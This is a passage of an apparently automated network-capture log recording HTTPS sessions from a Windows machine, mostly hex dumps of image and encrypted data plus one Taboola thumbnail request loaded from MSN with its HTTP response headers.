                                                              2021-10-20 13:08:56 UTC42INData Raw: 57 7e 1d 8c 2b 51 6c a3 11 43 ec ea 1b 6d 7d c5 e5 7a 8f 65 28 ee dc 44 73 da d0 9a 35 16 cd 6d 2d d1 87 88 32 f5 f0 dc 2c df ee 21 f8 5c 79 cd 02 88 b4 a9 39 ff 00 4d 51 86 95 17 ce 14 7b 5c 74 33 51 1b d0 99 50 eb cc 9f 74 c3 ee a7 7a 37 45 d4 89 52 df 90 c7 34 c9 2b 4a e2 d6 59 c5 4d 85 e6 ae 96 36 84 a2 30 a4 be 0b 48 58 fe 8d 29 02 1b 45 de fe 32 bb d5 1a 15 f8 88 f2 09 2b 5d 86 a2 db 79 de 14 65 53 4d fc be 21 00 17 50 49 ea c4 01 2e 87 e0 71 a3 53 6e 4c b3 3d 6c 23 05 5a 9b 67 43 aa b8 81 29 1d 95 12 ef 2b 56 21 7e 27 aa 47 f8 ca 88 1b 5b 67 26 2b d8 68 0c ee ea b8 25 4a b5 c6 91 2a d0 61 f1 27 2f 31 ee 80 06 e4 9b 01 33 7e 5d 61 a6 cc a4 07 3a 91 7e 60 4a b5 2b 77 a0 d4 cf f5 8e 62 2e 60 db 81 b8 83 32 90 c3 c4 4e 56 61 d4 4c eb 45 c3 15 e7 61 bc
                                                              Data Ascii: W~+QlCm}ze(Ds5m-2,!\y9MQ{\t3QPtz7ER4+JYM60HX)E2+]yeSM!PI.qSnL=l#ZgC)+V!~'G[g&+h%J*a'/13~]a:~`J+wb.`2NVaLEa
                                                              2021-10-20 13:08:56 UTC43INData Raw: 72 80 f6 a2 53 64 a5 5e 81 bd 1c 50 4d ed d1 a5 ac 2f 68 4a 61 e9 31 83 e1 1a fa 4d d8 43 99 69 1a 4b fd 64 38 3f aa 46 a5 86 76 35 2a b2 e8 d5 19 cd f4 e8 22 25 30 2c 05 b4 12 93 73 2a 5a cc 39 5f 4f d0 c2 4d 82 df 9d b7 9a 04 d2 1b 02 6c 26 e4 cb e8 04 fb 4b 15 a4 b7 d5 9c cb ae 19 0d 3a 5e 2e fa bb 41 c2 99 81 9f 10 13 6c 0d 7f d1 98 4b a9 42 7d 08 8c f8 67 56 ce 1b 53 4c 87 20 b2 f8 45 5c e7 33 15 00 66 27 9e 9d 96 71 08 a5 84 a6 2a 55 e8 d5 39 03 e0 20 29 7c b9 6e 38 bc 23 51 a4 ea d8 f0 85 b4 a6 f4 aa 05 74 5f 02 1e 68 03 19 a3 d4 28 a7 ca 6e 65 f8 c4 d7 19 89 42 d6 fc 09 a9 68 a9 49 05 91 2d 2c 42 66 51 79 6a 95 08 2e 5b 42 41 d8 79 08 05 47 5b 2b 1e 40 1b 69 06 6c 84 7a dc ce 2b 4a 94 8d 17 0f 9e 9d 8e a4 11 66 ea 25 0a d8 7a 42 e5 e9 1b 3d bc a1
                                                              Data Ascii: rSd^PM/hJa1MCiKd8?Fv5*"%0,s*Z9_OMl&K:^.AlKB}gVSL E\3f'q*U9 )|n8#Qt_h(neBhI-,BfQyj.[BAyG[+@ilz+Jf%zB=


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              7192.168.2.549837151.101.1.44443
                                                              TimestampkBytes transferredDirectionData
                                                              2021-10-20 13:08:56 UTC60OUTGET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F0d7ca0c89d5d09bf1d71170b01c3a769.jpg HTTP/1.1
                                                              Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                              Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                              Accept-Language: en-US
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                              Accept-Encoding: gzip, deflate
                                                              Host: img.img-taboola.com
                                                              Connection: Keep-Alive
                                                              2021-10-20 13:08:56 UTC61INHTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 20936
                                                              Server: nginx
                                                              Content-Type: image/jpeg
                                                              access-control-allow-headers: X-Requested-With
                                                              access-control-allow-origin: *
                                                              edge-cache-tag: 473400065816504481344293484750649737046,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                              etag: "5df328bbe8286a6a8e4b090ca69cf91a"
                                                              last-modified: Fri, 24 Sep 2021 14:34:42 GMT
                                                              status: 200 OK
                                                              timing-allow-origin: *
                                                              x-ratelimit-limit: 101
                                                              x-ratelimit-remaining: 99
                                                              x-ratelimit-reset: 1
                                                              x-request-id: 0d7fca08a2fdbad28b0e23d7330c8e5c
                                                              x-envoy-upstream-service-time: 23
                                                              X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb803
                                                              Via: 1.1 varnish, 1.1 varnish
                                                              Cache-Control: public, max-age=31536000
                                                              Accept-Ranges: bytes
                                                              Date: Wed, 20 Oct 2021 13:08:56 GMT
                                                              Age: 2022866
                                                              X-Served-By: cache-wdc5548-WDC, cache-dca17760-DCA, cache-mxp6942-MXP
                                                              X-Cache: HIT, HIT, HIT
                                                              X-Cache-Hits: 1, 1, 2
                                                              X-Timer: S1634735336.052823,VS0,VE0
                                                              Vary: ImageFormat
                                                              X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F0d7ca0c89d5d09bf1d71170b01c3a769.jpg
                                                              X-vcl-time-ms: 0
                                                              2021-10-20 13:08:56 UTC62INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 03 03 03 03 03 03 04 04 04 04 05 05 05 05 05 07 07 06 06 07 07 0b 08 09 08 09 08 0b 11 0b 0c 0b 0b 0c 0b 11 0f 12 0f 0e 0f 12 0f 1b 15 13 13 15 1b 1f 1a 19 1a 1f 26 22 22 26 30 2d 30 3e 3e 54 01 03 03 03 03 03 03 04 04 04 04 05 05 05 05 05 07 07 06 06 07 07 0b 08 09 08 09 08 0b 11 0b 0c 0b 0b 0c 0b 11 0f 12 0f 0e 0f 12 0f 1b 15 13 13 15 1b 1f 1a 19 1a 1f 26 22 22 26 30 2d 30 3e 3e 54 ff c2 00 11 08 01 37 00 cf 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 00 06 03 01 00 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 00 01 08 09 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ed 65 29 45 db 83 a0 11 a9 cb 51 94 60
                                                              Data Ascii: JFIF&""&0-0>>T&""&0-0>>T7"5e)EQ`
                                                              2021-10-20 13:08:56 UTC63INData Raw: 56 d0 dc 0f 89 19 82 c7 74 8e 0f 69 35 6b 45 86 8f 38 c0 29 7c 5c e6 2f 8b bb 12 c8 73 f3 80 98 c6 dd 27 48 d4 51 1d 80 b9 a9 b6 66 63 5a 27 30 09 37 32 a4 03 cc a9 d9 79 92 da 9d b3 0b 29 2e 64 8b 03 99 50 e3 1c cc 6c 83 b3 06 28 de 60 d3 a5 cc a9 91 24 cc 0f ff c4 00 31 10 00 01 04 02 02 02 02 01 02 06 02 01 05 00 00 00 03 01 02 04 05 00 06 07 11 12 13 08 21 14 15 31 10 22 23 32 41 51 16 20 17 18 24 33 35 61 ff da 00 08 01 01 00 01 09 00 6f 49 8d 63 53 ed 15 bd ab 7e d5 18 e4 55 45 45 44 c7 01 ae ed 7b 51 74 9d e7 8a 62 b1 33 c5 31 13 13 eb 11 51 53 3c 71 8c 55 5c f5 f4 a9 da 3d bd 3b 11 11 73 ac 4c f1 c5 fa c4 5e ff 00 82 e2 a6 35 7a 4c f3 fa c6 9d 7a e9 55 92 13 a5 f2 c4 73 5d 8e eb fc 2b 7a 5c 7b 13 ef ac 46 39 57 ae 9e 27 b5 3b e9 31 b8 88 98 d6 aa
                                                              Data Ascii: Vti5kE8)|\/s'HQfcZ'072y).dPl(`$1!1"#2AQ $35aoIcS~UEED{Qtb31QS<qU\=;sL^5zLzUs]+z\{F9W';1
                                                              2021-10-20 13:08:56 UTC65INData Raw: 2a 2e 95 43 e1 9e bc f0 ce b3 c3 bc 56 75 9e 38 a9 8a dc fb 4c 45 c7 3b a5 6a 74 c5 42 2a b7 10 86 ec cc 57 6e 6c 97 3b 67 e3 ba e3 8b 90 e7 d4 eb 97 3b d4 ba e4 d6 f8 86 d9 8e d4 ef ed e5 ed bb a4 aa f9 f7 e2 2d 07 1d dc 71 76 95 3c b4 34 82 b7 e4 0d 47 57 b4 fd 36 74 fd df 77 d6 0d ac ca a4 a6 5d 9b 6a b0 67 1c ea d0 75 8d c6 ca ec 97 7b 24 5b 6b 65 96 e1 a4 96 b8 41 b7 92 f9 0a 35 71 e0 d9 dd 00 4f 20 ac d1 f9 df 79 f5 82 09 0e f4 63 1b b0 72 de 81 ae 90 80 7c ab ff 00 95 3a 65 19 bc 48 19 9f 32 68 d0 aa c8 b7 fa 5f 37 ec 9b 78 88 48 15 d0 37 4d 7a d0 01 2c 73 97 64 a9 12 f4 f9 4d da 69 d5 7a 6c bb 82 d3 5f b4 5d 5a c7 b0 aa 1b 23 b1 24 df 58 6e 32 21 c8 6e bd 79 b7 d4 f3 ed fa 53 c8 b1 75 bd 85 98 2b df 45 79 47 43 c9 9b 3e ad b4 92 c7 67 a5 de 79 16
                                                              Data Ascii: *.CVu8LE;jtB*Wnl;g;-qv<4GW6tw]jgu{$[keA5qO ycr|:eH2h_7xH7Mz,sdMizl_]Z#$Xn2!nySu+EyGC>gy
                                                              2021-10-20 13:08:56 UTC66INData Raw: ce 29 d5 b5 f1 81 76 28 e1 e5 fe 71 66 b6 c3 53 eb 84 98 7b 89 44 99 30 93 d2 6d c8 13 cc 76 62 b9 b8 ac 98 f9 84 26 e1 be 6c db 94 99 a8 74 78 42 46 ab fd f1 46 90 dc 84 8e fe 23 df b6 2a 4a 9b fd 72 83 2d 36 8d ee d4 f2 a7 6c b2 f6 ed fa d6 46 99 c9 b2 a2 6c 1a 38 22 c0 8c 2b 53 55 f2 33 a2 5d 6a f0 2f 9b 50 e5 70 de e6 3b 11 3b 5c 78 0a 8a aa 88 8f 54 fd f1 a6 cb 79 3d 56 1c 68 ba e5 23 f6 3b 25 8e e9 3a ac ee 07 1c b0 52 ae b1 bc 6a 90 35 5d ba 0f e9 d1 e1 49 5f 78 9f 97 b2 6c ca e2 b6 bc 74 e2 65 85 64 49 5f 95 ab 6f f7 3a 79 c6 7a ea 0d 8b 9f f9 0e fa 82 d4 25 15 97 17 72 b5 be df 73 4d ae d0 af c6 bf 92 53 be 9b a0 0f e2 37 c9 d2 7f 55 34 61 7c 35 f9 18 ff 00 a2 eb ce f8 69 cc ec 0a 32 65 99 be 29 6f 41 2f b6 5f 28 2f c6 97 81 7c 25 73 66 c3 c7 d1
                                                              Data Ascii: )v(qfS{D0mvb&ltxBFF#*Jr-6lFl8"+SU3]j/Pp;;\xTy=Vh#;%:Rj5]I_xltedI_o:yz%rsMS7U4a|5i2e)oA/_(/|%sf
                                                              2021-10-20 13:08:56 UTC68INData Raw: bc 9f 3e 52 83 f4 e6 fc 54 df fb 54 7c c8 df 12 b6 27 89 4e 5b d7 fc 56 47 11 82 8b 68 cf 8a f2 58 2e cb 76 1f 8a 95 50 d8 f7 4b 9d 57 c1 5c 7b 5f 15 55 b1 6a 69 75 4a 19 8a e8 55 e2 19 be 9d ed 91 ad c5 8b ea 3c f3 1b b9 31 98 58 f2 2a e2 c5 90 37 fa e4 a0 86 c4 fc 57 05 91 5b 1d 23 38 66 71 02 c0 9c f0 cf 1a 33 85 2f fa f6 06 81 29 11 ee 09 dc 45 39 c4 82 2d 81 dc 03 0c ac 99 2e da 44 62 c7 72 e7 e5 fb a3 a4 80 a3 1f 62 88 02 3c 0c 82 91 7d ca 03 40 aa da 25 1d cf 87 64 da 0b 7a fb 20 7a ed 46 59 de f7 48 95 34 af 96 34 11 4d 2e 42 4a 96 c2 98 4c 35 64 eb 61 34 25 9a 68 d6 61 92 f7 38 a4 ad 8b 1e 2f 9c 97 ac 9a d9 d2 11 06 68 ba ec 78 71 9d eb b1 8f 00 10 cc 36 ba 73 21 31 ae 24 8a 5c 9f b9 92 94 ce 55 ad 4b 53 ce 41 92 b2 da ba 53 4c 65 fe b9 e5 c4 80
                                                              Data Ascii: >RTT|'N[VGhX.vPKW\{_UjiuJU<1X*7W[#8fq3/)E9-.Dbrb<}@%dz zFYH44M.BJL5da4%ha8/hxq6s!1$\UKSASLe
                                                              2021-10-20 13:08:56 UTC69INData Raw: 52 82 3b aa ec d5 ca e5 7c 6a 76 b4 e1 4f 54 ca e9 52 88 16 05 c2 d7 a2 81 10 43 84 4d 7d ec 12 85 c7 3c 15 4e a3 ce 54 a9 94 05 e9 01 2a a2 55 9c 46 81 e8 2d 78 02 39 91 4a 95 b1 40 47 b9 8f 14 b7 7e 1b 1c 8c 91 16 14 b2 9c f2 a5 06 2a 3d a8 02 b9 b2 21 9b cc ff 00 9f 3d 45 20 83 f5 24 44 23 ab 46 28 b1 8c 0b 11 39 02 65 0c 8b 18 be c6 b1 ac 3d 8f e2 3d f1 0e 78 f2 c4 e0 bc ea 47 16 27 f3 39 c4 b0 d5 40 d7 9d ef 24 2a 92 4b 69 62 da b6 8c c7 27 81 ae 00 eb 86 00 a4 38 9d 30 03 ff 00 e5 40 4d 8b 24 24 60 9a d6 21 5a df 3c 12 95 ff 00 4f 71 e2 38 c8 83 19 45 12 5c 5f 0f 5b 9b 4f 25 a1 41 14 a3 85 2c 51 80 26 c9 3f 80 95 1c e6 fe 32 99 8e 20 de f0 a8 0a a8 49 10 e2 23 62 bd 06 ee e4 85 e3 86 26 38 52 fc 9a f2 30 cc fa 64 35 92 4a c9 92 3d 33 a5 4e 3c ca c5
                                                              Data Ascii: R;|jvOTRCM}<NT*UF-x9J@G~*=!=E $D#F(9e==xG'9@$*Kib'80@M$$`!Z<Oq8E\_[O%A,Q&?2 I#b&8R0d5J=3N<
                                                              2021-10-20 13:08:56 UTC70INData Raw: f4 0b 3f 4a b9 c0 45 aa a5 03 55 c0 bd ce c2 ec 0b 7e 1c 0e 70 a9 b0 30 c9 71 27 90 ea a8 8c 94 11 83 c4 b4 15 6b 87 42 9c 09 18 68 69 e4 62 55 a2 d8 dd 1a 60 08 b4 7e 50 6d 3b 08 2d 37 75 94 29 82 13 d8 2a 01 9d 80 19 c4 ad 08 73 68 39 8f 9c bf 99 e4 55 08 60 73 7e 59 91 e2 ae 6f 27 05 72 71 f7 70 62 54 06 3c 3d a5 d8 30 e0 4c a7 b9 c2 2d 12 bd e8 50 f2 e0 46 20 1c 42 21 d1 97 af f6 79 26 b6 66 1c 56 a0 ba 9d 27 10 72 27 27 2b 43 a9 a9 54 56 0f 20 90 d6 c6 23 aa 00 de 7f a8 f2 25 7e a1 a6 0f 2c 2e 12 37 c6 10 d5 69 9d b3 d8 7c 51 b5 c1 c0 93 69 08 11 04 1d cb 4f 92 b8 5a 09 80 bb 46 8e 89 b5 58 e3 00 85 7b 95 c7 b9 17 3c 1e e5 aa a8 2c 78 39 05 a5 69 b5 1e af 52 f8 90 44 10 31 20 a6 fa 4f 4f f4 bc 2a 67 d1 bb 1b be e4 a6 b3 d1 ae c8 14 8c a6 52 d3 d3 93
                                                              Data Ascii: ?JEU~p0q'kBhibU`~Pm;-7u)*sh9U`s~Yo'rqpbT<=0L-PF B!y&fV'r''+CTV #%~,.7i|QiOZFX{<,x9iRD1 OO*gR
                                                              2021-10-20 13:08:56 UTC72INData Raw: 4e 59 46 39 62 06 58 dc 8e ed 4f 51 0a d6 d3 40 28 de 46 a4 12 3d 56 11 53 a4 af de 17 36 70 4d 97 2b 5b 47 e3 4d e7 e7 d7 70 96 b6 92 9e 3c 21 91 e1 8d 22 49 e6 99 f1 04 06 05 14 5a e9 6e 35 b8 35 30 8d a6 57 db 21 a7 92 18 26 2e 4c 93 3c b9 a4 84 5c d9 c8 44 20 12 6c 6d a8 60 dc ea ea da 7a b5 11 4a 23 01 10 f5 1c 16 66 6e a1 0e 08 ea 8b 1e 75 51 47 57 05 2d 5d 3c f5 29 b5 c3 2a d6 8a 94 2b 69 03 ca 7b 71 ed 20 f1 aa 8d db 61 db a9 25 7a aa 49 dd 96 6d d1 51 01 45 91 e5 69 48 cd d1 15 55 6d 65 be ab f6 b9 fe 2f be fb 57 fb 46 78 e7 99 7a eb 75 0d 2a 24 63 05 5e 40 23 80 75 16 e5 5f bb 53 c9 54 95 11 83 f2 a2 38 86 4d 24 33 d9 6d 21 04 32 2a f7 5b 52 38 dd 69 56 98 d4 75 0b d6 85 89 c4 ca 8f 00 bf 5d 06 1c 4b 89 75 f0 7f bb 79 56 6e a3 3c a1 c6 28 63 01
                                                              Data Ascii: NYF9bXOQ@(F=VS6pM+[GMp<!"IZn550W!&.L<\D lm`zJ#fnuQGW-]<)*+i{q a%zImQEiHUme/WFxzu*$c^@#u_ST8M$3m!2*[R8iVu]KuyVn<(c
                                                              2021-10-20 13:08:56 UTC73INData Raw: 78 d7 c3 d4 b5 8f 2a 48 95 15 26 5a 72 b8 47 80 4b 3c 55 0b 81 3c 90 46 be 19 de a7 db cd 48 53 b2 7c 4e 94 53 32 d4 a6 0f 65 9a 9a 04 cc ad d7 55 1f 0c c3 25 3c 30 ac 5b 8d 19 a5 82 79 a3 91 df a9 fb 45 24 92 98 92 5a d9 3b 8f 60 35 50 89 24 4f 4b 24 55 12 54 ac ad d4 91 6a 13 a3 d5 c9 38 04 fd c1 e4 ea 8c d5 57 b4 a9 34 f3 52 09 a4 a2 11 82 23 f9 77 38 9e a6 4c 4e 76 ba 9f 1a a5 30 18 1a 28 e6 81 af 50 cf 18 52 85 d5 cf f8 7c f9 36 26 e4 f3 a9 04 93 41 24 6f c2 c2 b6 08 6f 97 71 b3 db d8 81 88 b0 d2 ca e5 93 10 12 ca 2f c0 3c 01 7b df d4 e9 a3 48 57 01 9c 87 20 82 ca 6c c3 cd c9 e0 69 6a 64 47 62 63 37 3e 39 e4 78 e3 1b e8 4e aa 1e f8 a9 04 00 6e 6e 00 be 20 f1 7d 15 cc 5e 32 a0 96 62 78 36 be 9d b8 16 6b 11 70 3e ff 00 ac d8 79 36 bd b4 76 bf 87 f6 a0
                                                              Data Ascii: x*H&ZrGK<U<FHS|NS2eU%<0[yE$Z;`5P$OK$UTj8W4R#w8LNv0(PR|6&A$ooq/<{HW lijdGbc7>9xNnn }^2bx6kp>y6v
                                                              2021-10-20 13:08:56 UTC74INData Raw: 74 97 73 a3 02 05 89 62 aa 95 10 33 8e 90 04 29 e9 a8 e9 df 1f 43 e4 e8 c5 32 3a ca 9b 55 0d 04 51 2c 8d 91 43 df 34 35 77 c5 58 1e e2 34 ed 35 05 14 cf 11 03 80 e2 36 64 c8 fa 06 60 16 fa 7a 5f 91 d9 68 aa eb 27 0e 9d ac ea c1 c9 67 0c 2c 19 0d f5 b1 d6 0a 88 01 86 9b 7e c6 8f e7 1f d5 a9 e7 71 4d 13 28 04 73 98 d5 3c 53 53 bb a5 4b d1 57 18 82 b2 70 42 ac 85 c1 fe 0d aa 98 38 e7 e7 69 45 51 fb 00 85 86 b6 87 cc 80 1f e4 a9 91 98 83 8f 20 80 da f8 78 b3 b1 66 78 a9 8d 24 ae 58 f2 6f 48 51 d8 e9 36 8d f3 65 af 06 a6 9a 2d ca 52 d2 c2 ff 00 be ab 5b 21 6b a1 b7 03 82 a7 43 68 9d 80 9e b5 60 08 8b 35 43 00 24 77 65 19 30 95 bb 88 24 db 49 2d 55 1c 0f 04 f0 07 06 55 11 b9 08 c5 7c d8 a5 b9 d4 f4 93 46 19 44 88 a8 d7 56 20 95 61 22 b0 20 95 1e 2c 7d 8e b6 d9
                                                              Data Ascii: tsb3)C2:UQ,C45wX456d`z_h'g,~qM(s<SSKWpB8iEQ xfx$XoHQ6e-R[!kCh`5C$we0$I-UU|FDV a" ,}
                                                              2021-10-20 13:08:56 UTC76INData Raw: a4 9e 2e bc 51 20 6c 1a 66 8c dc 3b 33 76 a0 61 61 62 75 1e db 5f b4 ee a9 49 bb 40 90 08 0c 4b 28 28 d7 4b 02 32 d7 2a c4 11 fa b2 1e eb cf eb ee 99 a3 41 f6 ca e7 fd 34 28 e9 21 88 cf 5d 56 57 21 4f 4e a4 02 c1 6e 32 72 48 54 5f 52 75 d2 12 d9 23 dc b7 03 f3 46 79 7c 2f 50 9e 22 2f ff 00 64 01 a4 a6 a2 df 29 27 a1 78 97 80 95 2a 73 88 db d2 ef 8e ac 75 50 df 2b 4e b3 d6 cf 14 42 41 02 bb 59 7a 84 90 10 7d 4f 9b ea 57 94 a6 32 83 2b 62 5d 0e 27 f2 11 c1 d7 c3 12 cf 11 ec a8 a9 a3 32 cc a7 dd 5d 8b 10 75 b6 6d cf f2 ce cd 53 07 51 d8 8c 4d f8 6b f1 aa df 88 a0 da 9c c2 b5 d4 91 b0 a7 71 25 a4 ea f5 d4 80 5a 4b e6 c1 98 9b ea 47 e1 15 33 9a 8d 0a e2 3c d8 48 aa 4f be 5a 85 1c f5 09 6f da 3b 7a db 3e 2d 81 9b 0d 6d 94 80 e0 19 a4 de 29 40 7b 79 bf e2 b3 6b
                                                              Data Ascii: .Q lf;3vaabu_I@K((K2*A4(!]VW!ONn2rHT_Ru#Fy|/P"/d)'x*suP+NBAYz}OW2+b]'2]umSQMkq%ZKG3<HOZo;z>-m)@{yk
                                                              2021-10-20 13:08:56 UTC77INData Raw: 37 3b 49 2f 62 33 a9 01 15 02 b2 b1 0f 6e 09 1a dc 25 92 57 ce 39 20 a9 8a 04 45 f1 63 13 44 e4 9f ae 43 5b 82 6d 3b 85 6d 4d 14 73 c7 4b 0d 50 4a 9a 65 47 78 65 1d 68 8a 3e 32 2b 2d fc 83 c6 be 38 10 38 e6 9f 6f a0 a6 a6 46 3f f6 8b d5 b8 d7 e9 1d 31 8d 11 23 81 76 d4 44 54 1e 15 5b 2d 7e 90 3e 2b dc 6e 0b 99 c5 1b e2 18 d8 34 cc 1b a5 12 7a 64 40 1a d9 7e 14 4a d9 9e 74 d9 ab f7 1a 5a aa 9a 25 97 92 8f f2 2b 51 c0 3f 93 8d 7c 2f c0 f0 bf b4 4d ff 00 96 dd aa 39 07 fd da 2a c9 0f f2 92 9a 2d 6f 92 1f 5e 96 c6 66 fe 59 55 41 af 89 aa 87 ff 00 22 48 3f fe 8c 9a f8 96 ac de f9 1a 9a 58 3f a3 c3 3e be 21 76 03 8c b7 2d b4 ff 00 a6 d9 ad ca 8a 71 0a a4 f5 30 ee b5 90 4b d2 27 2c 1a 4d bb e5 0e b7 9f 8a c5 6e d8 20 a0 db f7 fa 2a cd ca 7a 09 1b f1 18 d4 cd 53
                                                              Data Ascii: 7;I/b3n%W9 EcDC[m;mMsKPJeGxeh>2+-88oF?1#vDT[-~>+n4zd@~JtZ%+Q?|/M9*-o^fYUA"H?X?>!v-q0K',Mn *zS
                                                              2021-10-20 13:08:56 UTC78INData Raw: 70 a7 15 21 8f d2 fe 74 f2 18 b2 b2 86 96 56 bc 9c 9b 2d 8f a0 d3 ac 6d 18 92 39 7a cb 8b 5c da d6 c0 da c3 c6 85 60 69 ce 2e 71 3d a3 b8 d8 c3 6b 28 b9 00 79 b0 d2 cb d4 81 99 b3 92 42 83 12 08 2c 48 61 c5 c1 17 3a 82 48 a2 0a 47 4a 9f 08 b8 36 07 b9 df cf df 42 79 a9 4d c1 bc 0c c8 5c 06 55 20 02 41 b1 b8 e6 fc ea 68 62 31 80 94 ed 12 63 90 39 dd 4d ae cd eb c9 d6 e1 55 00 77 93 a6 b5 0f 16 59 12 59 79 6f 00 1b 81 7d 43 4c 91 46 03 8c 52 59 11 9b 9b 67 9f 69 1e 7c 5b 55 71 31 60 51 c5 3a 15 6f 16 4c b0 2b 8f a5 ec 48 d2 54 ca 41 e6 d8 dd d4 59 6e 19 31 bf dc e8 c2 2a 64 0b 99 10 53 a8 26 d6 16 95 c1 2d e0 da da 69 19 d4 46 d1 c8 d1 d8 03 75 17 30 23 5b 90 7c 6a 7d ba 79 2a 04 b3 25 3c cb 55 89 91 98 97 c2 64 c8 e4 45 c9 3c eb 73 31 9e ff 00 c7 a8 8d 57
                                                              Data Ascii: p!tV-m9z\`i.q=k(yB,Ha:HGJ6ByM\U Ahb1c9MUwYYyo}CLFRYgi|[Uq1`Q:oL+HTAYn1*dS&-iFu0#[|j}y*%<UdE<s1W
                                                              2021-10-20 13:08:56 UTC80INData Raw: f0 7d c8 1a 92 64 c0 c9 20 3d a1 6e 40 b7 68 b0 4f 71 a8 22 1d 8f 14 0d 54 a8 f1 80 cc 8e c5 94 da d8 9f 1c 5b 58 c6 82 47 77 8e 44 94 bb a1 00 04 01 81 c7 cf 26 da 65 92 15 c2 15 8e 95 9d 41 60 79 e1 1b 0e 34 cc d1 64 b1 9b f6 dd 54 9b 80 54 85 d1 25 d7 22 57 02 aa 5b b8 9f 2a 7f 90 d4 4e 7a 98 a3 9b 80 43 fa 58 5c 8d 4a a3 20 aa ab 20 25 3a 9e b9 0b b0 02 f7 62 0e ac ce a5 60 ca 7b 92 01 0a 4b 0b 8f 62 40 d4 52 1c 14 96 2a 09 52 45 88 3f 9b db d3 54 91 c0 1d 8b b0 8f c3 2d 90 37 02 ff 00 c4 8d 5a 32 51 6d 8e 4c 49 24 28 00 a7 81 ef 7d 45 23 49 c0 4c e2 95 a5 b1 1c 5a cc 41 f4 b7 81 e4 ea 54 89 5a 52 88 90 2c 7c 29 1d b2 74 ac 09 06 fd c7 8e 7d f4 c8 73 c5 0c b6 6b b1 50 2d 72 53 8b 8e 6e 09 b1 3c 8d 54 a3 47 50 51 f0 74 40 ae 19 87 8b 62 41 1d df 55 d4
                                                              Data Ascii: }d =n@hOq"T[XGwD&eA`y4dTT%"W[*NzCX\J %:b`{Kb@R*RE?T-7Z2QmLI$(}E#ILZATZR,|)t}skP-rSn<TGPQt@bAU
                                                              2021-10-20 13:08:56 UTC81INData Raw: 21 43 b0 5c 08 5c 01 2b 7b b2 37 04 12 07 37 07 44 49 d3 40 e8 b2 31 78 c2 b1 66 b6 57 00 8f 1e fa bc 88 55 6c ac 19 57 02 47 20 8b b1 b7 9b 72 75 53 b8 1a 76 58 f2 a6 a7 74 2a af 7e 4c 33 48 3b 94 81 63 c0 bf 8d 39 96 76 5b f5 90 82 92 1b 0c 43 a0 b0 b8 b9 36 b1 e3 53 86 86 ac bc 68 3e 68 14 61 26 4c 00 61 e1 8a 90 47 9f 6d 56 40 8a 50 2a a3 bf 8b 14 01 8f 00 12 47 a0 1c ea 91 9f e5 a7 8d 83 06 49 80 1c 84 24 80 45 96 c7 13 7e ed 24 d1 3b 03 22 ae 05 d0 92 0b df 8e 41 b7 dc e9 e9 9c 39 2e 43 81 73 23 76 de 4e 38 b8 27 ea 6f aa 8b 53 44 23 75 67 cd ec a5 8e 00 95 ca e0 28 07 16 bf 17 d4 91 3c 19 66 08 07 8b 10 5d 8f 1d a6 d7 c8 5a e3 53 4d 44 ed 60 11 5e 56 79 33 bc 41 4a a9 0a b6 1f 50 78 e4 6b 70 db a1 33 17 b3 c1 0c 97 66 90 d8 12 a5 c0 51 6e 40 e4 f9
                                                              Data Ascii: !C\\+{77DI@1xfWUlWG ruSvXt*~L3H;c9v[C6Sh>ha&LaGmV@P*GI$E~$;"A9.Cs#vN8'oSD#ug(<f]ZSMD`^Vy3AJPxkp3fQn@
                                                              2021-10-20 13:08:56 UTC82INData Raw: 6c 00 04 dc 11 73 7d 28 1d 4b 77 5d 81 0d e7 82 38 3e da 12 55 05 c6 33 d1 4e 11 81 6e e3 60 4d ad a2 24 6b a2 c8 ca 1b 12 05 b2 51 c5 b4 25 3d 3b 66 f6 00 9f 1f 53 eb a8 f3 ff 00 05 7f 74 70 d7 7b da f7 d7 42 aa 64 7b 08 d4 30 ec 17 6b 17 56 1c 79 d5 5c 51 42 d7 a8 8e 27 01 d9 2e 3b 5e dc 10 7c f1 a0 ca a8 1d 92 50 5c d8 f8 37 00 70 48 d4 13 bc ef 14 c0 f5 24 50 84 01 c7 27 8f 4f 1a a4 cb 35 5a 93 36 6d 9c 2c 7b 82 10 78 71 e8 4f 1a 96 24 80 e0 ea 64 51 9b 37 7f a5 f8 20 df 4c 1c b2 a2 43 3b 3b 23 06 62 32 18 13 c9 b7 ae b2 66 72 e1 26 ef 01 91 59 b2 06 d7 24 7d c7 1a 11 43 4f 1a ad 44 82 38 fa 93 44 07 0a 18 86 b0 3e c4 1d 55 4d 1d 47 4c bc 93 ca c1 88 b0 20 81 76 0a bc 58 da c7 56 8a 28 d6 25 6b 19 95 0d f0 2a af 25 dc 79 f3 6d 54 cb 4b 1c 7d 22 7a 71
                                                              Data Ascii: ls}(Kw]8>U3Nn`M$kQ%=;fStp{Bd{0kVy\QB'.;^|P\7pH$P'O5Z6m,{xqO$dQ7 LC;;#b2fr&Y$}COD8D>UMGL vXV(%k*%ymTK}"zq


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              8192.168.2.549832151.101.1.44443
                                                              TimestampkBytes transferredDirectionData
